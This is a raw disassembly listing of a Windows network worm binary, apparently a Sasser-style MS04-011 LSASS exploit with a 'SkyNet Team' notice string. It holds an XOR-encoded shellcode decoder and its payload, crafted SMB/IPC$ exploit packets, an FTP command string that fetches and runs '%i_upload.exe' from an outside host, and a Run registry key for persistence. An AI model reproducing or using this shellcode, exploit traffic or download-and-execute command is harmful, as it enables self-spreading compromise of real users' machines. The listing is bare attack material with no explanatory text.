db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406F34�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4036B9+119�o
align 4
asc_40540C db 0Ah ; DATA XREF: sub_4036B9+F1�o
db 0Ah,0
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4036B9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4036B9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4036B9+7D�o
align 4
dword_405448 dd 2 dup(0) ; sub_4047EE+36�o
dword_405450 dd 0FFFFFFFFh, 403905h, 403909haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404663+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404663+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404663+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404663+D�o
align 4
dword_405498 dd 0FFFFFFFFh, 4048FEh, 404902h, 0FFFFFFFFh, 4049B2h, 4049B6h
; DATA XREF: sub_4047EE+5�o
dd 562Ch, 2 dup(0)
dd 56A6h, 50F0h, 5554h, 2 dup(0)
dd 57D0h, 5018h, 5640h, 2 dup(0)
dd 57DEh, 5104h, 5638h, 2 dup(0)
dd 5806h, 50FCh, 553Ch, 2 dup(0)
dd 586Ah, 5000h, 567Ch, 2 dup(0)
dd 58ACh, 5140h, 5 dup(0)
dd 5812h, 5858h, 5840h, 5832h, 5820h, 0
dd 7C80BE01h, 7C834E64h, 7C838AE7h, 7C835406h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C80C108h, 7C8098EBh, 7C910331h, 7C80E93Fh
dd 7C80929Ch, 7C8286EEh, 7C821363h, 7C801D77h, 7C9179FDh
dd 7C809A51h, 7C9105D4h, 7C8127A7h, 7C809915h, 7C812E76h
dd 7C80A490h, 7C838A0Ch, 7C809BF8h, 7C810D87h, 7C937A40h
dd 7C91043Dh, 7C809AE4h, 7C812BB6h, 7C810EF8h, 7C810E51h
dd 7C812F39h, 7C80CC97h, 7C80CCA8h, 7C80ADA0h, 7C838DE8h
dd 7C812F08h, 7C81CF5Bh, 7C80A0D4h, 7C814AE7h, 7C80B6A1h
dd 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh, 7C801E16h
dd 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 0
dd 7E41A8ADh, 7E45058Ah, 0
dd 57EAh, 0
dd 80000073h, 80000002h, 8000000Dh, 80000001h, 80000010h
dd 80000013h, 80000009h, 80000017h, 80000004h, 80000003h
dd 80000039h, 8000000Ch, 8000000Bh, 80000034h, 0
dd 588Ah, 589Ah, 5878h, 0
dd 654D0000h, 67617373h, 786F4265h, 41h, 72707377h, 66746E69h
dd 53550041h, 32335245h, 6C6C642Eh, 0
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 736C0000h, 70637274h
dd 4179h, 6C5F0000h, 736F6C63h, 65h, 72776C5Fh, 657469h
dd 6C5F0000h, 6565736Ch, 6Bh, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 4
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65530000h, 72685474h, 50646165h, 726F6972h, 797469h
dd 65470000h, 72754374h, 746E6572h, 65726854h, 6461h, 65470000h
dd 73614C74h, 72724574h, 726Fh, 72430000h, 65746165h, 6574754Dh
dd 4178h, 65470000h, 63695474h, 756F436Bh, 746Eh, 6F430000h
dd 69467970h, 41656Ch, 65470000h, 6E695774h, 73776F64h
dd 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 53570000h, 32335F32h, 6C6C642Eh, 0
aInternetgetcon db 'InternetGetConnectedState',0
aWininet_dll db 'WININET.dll',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 6C654467h, 56657465h, 65756C61h, 41h, 4F676552h
dd 4B6E6570h, 417965h, 62410000h, 5374726Fh, 65747379h
dd 7568536Dh, 776F6474h, 416Eh, 65520000h, 74655367h, 756C6156h
dd 41784565h, 44410000h, 49504156h, 642E3233h, 6C6Ch, 63490000h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 65h, 706D6349h, 646E6553h
dd 6F686345h, 0
aIcmpcreatefile db 'IcmpCreateFile',0
align 4
aIphlpapi_dll db 'iphlpapi.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 10h
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 4
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 10h
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 143h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403D5B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40126C+AA�r
; "echo off&echo open %s 1023>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_401583+132�o
; sub_401583+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_405AF4+4EEh
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_401583+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40137D+15D�o
; sub_401583+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+188�o
; sub_401583+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+1AD�o
; sub_401583+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+53�o
; sub_401583+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_40137D+85�o
; sub_401583+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401493+2 ; DATA XREF: sub_401583+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd offset word_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_401583+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset dword_406924 ; DATA XREF: sub_40219B:loc_4021F3�r
; sub_40219B+B6�r
dd offset dword_406918
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B59+1A�r
; sub_401B59+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B59+77�r
; sub_401B59+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B59+A8�r
; sub_401B59+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B59+2C6�r
; sub_401B59+2D3�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B59+184�r
; sub_401B59+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B59+1B9�r
; sub_401B59+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4Fhdword_406918 dd 5341534Ch, 56532053h, 52hdword_406924 dd 7361736Ch, 652E7373h, 6578haEchoOffEchoOpe db 'echo off&echo open %s 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_upload.exe>>cmd.ftp&echo bye>>'
db 'cmd.ftp&echo on&ftp -s:cmd.ftp&%i_upload.exe&echo off&del cmd.ftp'
db '&echo on',0Ah,0
align 10h
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
asc_406A0C db 0Dh,0Ah,0 ; DATA XREF: sub_401210+40�o
align 10h
aCFtplog_txt db 'c:\ftplog.txt',0 ; DATA XREF: sub_401210+9�o
align 10h
aSC db '%s%c',0 ; DATA XREF: sub_40137D+1DF�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40137D+20�o
; sub_401583+23�o
align 4
dword_406A34 dd 6EB06EBh, 0 dword_406A3C dd 1CEC8166h dword_406A40 dd 0E4FF07h dword_406A44 dd 302E35h dword_406A48 dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: sub_401B59+2E4�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B59+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B59+173�o
; sub_401F4B+79�o
word_406A68 dw 2Ch ; DATA XREF: sub_401B59+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B59+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B59+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B59+64�o
align 4
asc_406A84: ; DATA XREF: sub_401F4B+157�o
unicode 0, < >,0
a1_YourComputer db '1. Your computer is affected by the MS04-011 vulnerability',0Dh,0Ah
; DATA XREF: sub_4020D9+B2�o
db '2. It can be that dangerous computer viruses similar',0Dh,0Ah
db ' the Blaster worm infect your computer',0Dh,0Ah
db '3. Please update your computer with the MS04-011 LSASS patch',0Dh,0Ah
db ' from the www.microsoft.com website',0Dh,0Ah
db '4. This is an message from the SkyNet Team for',0Dh,0Ah
db ' malicious activity prevention',0Dh,0Ah,0
align 4
aSkynet db 'SkyNet',0 ; DATA XREF: sub_4020D9+AD�o
align 4
aSkynetnotice db 'SkynetNotice',0 ; DATA XREF: sub_4020D9+3F�o
align 4
aDrvddll_exe db 'Drvddll_exe',0 ; DATA XREF: sub_40219B+EB�o
aDrvsys_exe db 'drvsys.exe',0 ; DATA XREF: sub_40219B+DF�o
align 4
aSsgrate_exe db 'ssgrate.exe',0 ; DATA XREF: sub_40219B+CE�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_40219B+8B�o
align 10h
asc_406C50: ; DATA XREF: sub_40219B+4B�o
unicode 0, <\>,0
align 10h
off_406C60 dd offset sub_402BEF ; DATA XREF: sub_402A24+1C�r
dword_406C64 dd 2 ; sub_4036B9+46�r
align 10h
off_406C70 dd offset word_406C7A ; DATA XREF: sub_402900+1E�r
; sub_402B3C+12�r ...
dd offset word_406C7A
db 2 dup(0)
word_406C7A dw 20h ; DATA XREF: sub_403966:loc_40397E�r
; .text:off_406C70�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406E7C dd 1 dd 2Eh, 1
dword_406E88 dd 0C0000005h ; sub_402DF4+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406F00 dd 3 dword_406F04 dd 7 dword_406F08 dd 0Ah dword_406F0C dd 8Ch ; sub_402CB3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406F1C dd 19930520h, 4 dup(0) ; sub_403586+2�o
dword_406F30 dd 2 ; sub_4036B9+28�r
off_406F34 dd offset aR6002FloatingP ; DATA XREF: sub_4036B9+FC�r
; sub_4036B9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 405390h, 9, 405364h, 0Ah, 405340h, 10h, 405314h
dd 11h, 4052E4h, 12h, 4052C0h, 13h, 405294h, 18h, 40525Ch
dd 19h, 405234h, 1Ah, 4051FCh, 1Bh, 4051C4h, 1Ch, 40519Ch
dd 78h, 40518Ch, 79h, 40517Ch, 7Ah, 40516Ch, 0FCh, 406A0Ch
dd 0FFh, 40515Ch
byte_406FC0 db 1 ; DATA XREF: sub_4036B9+1B�o
; sub_403997+E1�r
db 2, 4, 8
align 8
dword_406FC8 dd 3A4h dword_406FCC dd 82798260h, 21h, 0dword_406FD8 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h
dword_40707C dd 0 ; .text:00406638�o ...
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4070B8 dd 3F8h ; sub_403DE4+5�r
align 10h
dword_4070C0 dd 0 ; sub_401000+10�w ...
dword_4070C4 dd 0 dword_4070C8 dd 0 ; sub_40137D+C�o ...
dword_4070CC dd 0 ; sub_402770+91�w
dword_4070D0 dd 0 ; sub_402E8F:loc_402EA1�r ...
align 8
dword_4070D8 dd 0 dd 3 dup(0)
dword_4070E8 dd 0 dword_4070EC dd 0 dword_4070F0 dd 0 dword_4070F4 dd 0 dword_4070F8 dd 0 dword_4070FC dd 0 dd 0
dword_407104 dd 0 dd 3 dup(0)
dword_407114 dd 0 dd 0
byte_40711C db 0 ; DATA XREF: sub_402C00+2D�w
align 10h
dword_407120 dd 0 dword_407124 dd 0 ; sub_402C00+8B�w
dword_407128 dd 0 ; sub_402CB3+46�w ...
dword_40712C dd 41h dup(0) dword_407230 dd 0 ; sub_403195+23�w ...
dword_407234 dd 0 dword_407238 dd 0 ; sub_40380C:loc_403876�w
dword_40723C dd 0 ; sub_403B30+4�w ...
dword_407240 dd 0 ; resolved to->USER32.MessageBoxA ; sub_404663+2E�w ...
dword_407244 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_404663:loc_4046B2�r
dword_407248 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_404663+60�r
dd 2 dup(0)
dword_407254 dd 0 dd 3 dup(0)
dword_407264 dd 0 ; sub_403B30+3A�r ...
dd 0
dword_40726C dd 0 ; sub_4047EE+4C�w ...
dword_407270 dd 0 dword_407274 dd 0 dword_407278 dd 0 ; sub_4044B7+5�r ...
dword_40727C dd 0 ; sub_403E83+259�r ...
dword_407280 dd 0 ; sub_403E83+310�w ...
dword_407284 dd 0 ; sub_403E83+22C�r ...
dword_407288 dd 0 ; sub_403E58�r ...
dword_40728C dd 0 ; sub_403E58+8�r ...
dword_407290 dd 0 ; sub_403997+65�w ...
align 10h
dword_4072A0 dd 3 dup(0) ; sub_403997+171�o ...
dword_4072AC dd 0 ; sub_403997+15D�w ...
dd 4 dup(0)
byte_4072C0 db 0 ; DATA XREF: sub_403BD6:loc_403CE2�w
; sub_403BD6:loc_403CFF�w ...
align 4
dd 3Fh dup(0)
byte_4073C0 db 0 ; DATA XREF: sub_403997+5C�o
; sub_403997+AF�o ...
byte_4073C1 db 0 ; DATA XREF: sub_402FE1+3F�r
; sub_402FE1+84�r ...
align 4
dd 40h dup(0)
dword_4074C4 dd 0 ; sub_403997+12B�w ...
dword_4074C8 dd 0 ; sub_403472+29�r ...
dd 5 dup(0)
dword_4074E0 dd 0 ; sub_4032C7+45�r ...
dword_4074E4 dd 3Fh dup(0) dword_4075E0 dd 0 ; sub_4032C7:loc_403351�r ...
dword_4075E4 dd 0 dword_4075E8 dd 0 dword_4075EC dd 0 dword_4075F0 dd 0 ; sub_402C00+57�r
dword_4075F4 dd 0 dword_4075F8 dd 0 ; sub_402E37+F�r ...
align 1000h
_text ends
; Section 2. (virtual address 00008000)
; Virtual size : 00034000 ( 212992.)
; Section size in file : 0002F600 ( 194048.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 408000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 7C801D77h, 7C80ADA0h, 7C809A51h, 7C809AE4h, 0
dd 8000h, 0
dd 0FFFFFFFFh, 803Ch, 8000h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 47000000h, 72507465h, 6441636Fh
dd 73657264h, 73h, 72695600h, 6C617574h, 6F6C6C41h, 63h
dd 72695600h, 6C617574h, 65657246h, 2C8D0000h, 12B9CC65h
dd 0D2708F0h, 42D27649h, 7754046Ah, 84612950h, 0E1B60F25h
dd 42F8A4Dh, 0F48884EAh, 1C4B750Eh, 3D825013h, 48E1080Eh
dd 8B1C6001h, 3A7A2474h, 3C283C7Ch, 0FC2C0044h, 80B2DB33h
dd 74180039h, 2B3A442h, 3DC16DE8h, 0C933F673h, 94364E5h
dd 0CAC0CB1Ch, 8723115Bh, 10B04136h, 3F194FC6h, 0F701C012h
dd 0EBAA3F75h, 8F4DF9D4h, 99CB2B1Dh, 0EB10422Eh, 0D179AC28h
dd 134D740Fh, 911C20C9h, 7EE0C148h, 0CE2CFA08h, 7D0C3D2Dh
dd 801D0A7Dh, 64105FCh, 777FF883h, 95818CB8h, 1B3C58Bh
dd 2BF7D456h, 0A4F3F000h, 28EEB5Eh, 57503D2h, 1246168Ah
dd 0EA06C3BBh, 0FFEEE841h, 0D886DD02h, 0F2720FE7h, 0A22BC32Ah
dd 1C088960h, 0E010C261h, 54B9A648h, 702E0440h, 1901AD29h
dd 83040680h, 0F47DF809h, 0FDEBA077h, 0CC6AE07Fh, 0B02FBB18h
dd 341F5452h, 34440804h, 6048808Ah, 8589D08h, 21410BAh
dd 5450201Dh, 53F0CAADh, 1029100Ah, 0F5A9A04h, 0A7201016h
dd 53FA03Dh, 53884401h, 57525102h, 80E85556h, 0ED815D1Eh
dd 40116130h, 8025B58Dh, 0FC468B0Dh, 0A304C083h, 856C1D9h
dd 31C1687h, 89E18EC2h, 42128F8Dh, 0D912018h, 8C240C93h
dd 28239743h, 0DE8F9B10h, 854473E0h, 0E1874F6h, 3B52BB9h
dd 757BFCF2h, 25FA4840h, 0E28DE677h, 513FC29Fh, 0A1AF26E8h
dd 0BE2C4EC6h, 6AC484D8h, 98685240h, 6EC5128h, 858912FFh
dd 5608438Bh, 3103D7E8h, 804DF0Ch, 2A0242CBh, 34023362h
dd 840FC985h, 66558F89h, 202A5108h, 8500053Eh, 8B7B74C0h
dd 0C6176F95h, 0D738DEFh, 87544C6h, 136720D0h, 0F72DEB0Ch
dd 48057C1h, 81521E74h, 7F8990E1h, 85338D51h, 11503123h
dd 0A183C0Eh, 267D95FFh, 9BC1D14h, 6C80308h, 213F52D0h
dd 6A5112D1h, 0BB1E29E7h, 8AA66816h, 19187995h, 12C31001h
dd 0C4B44468h, 998BB52Bh, 9F7EDD06h, 15B3C79Ah, 5D0E000Ch
dd 595A5F5Eh, 4AE1C35Bh, 77A2CC01h, 4309D0BBh, 6D098132h
dd 1C507924h, 746E4507h, 5020C072h, 10DD696Fh, 8B34E9Dh
dd 0D475D346h, 6854C6C0h, 7F70FC65h, 0F7637672h, 0F914B6FBh
dd 18702452h, 63FE7325h, 646C46C7h, 625B99FFh, 4A6738BDh
dd 0FF4E9D61h, 0BCEF387Eh, 7F79BC6Bh, 636C6D7Ch, 0C76B202Eh
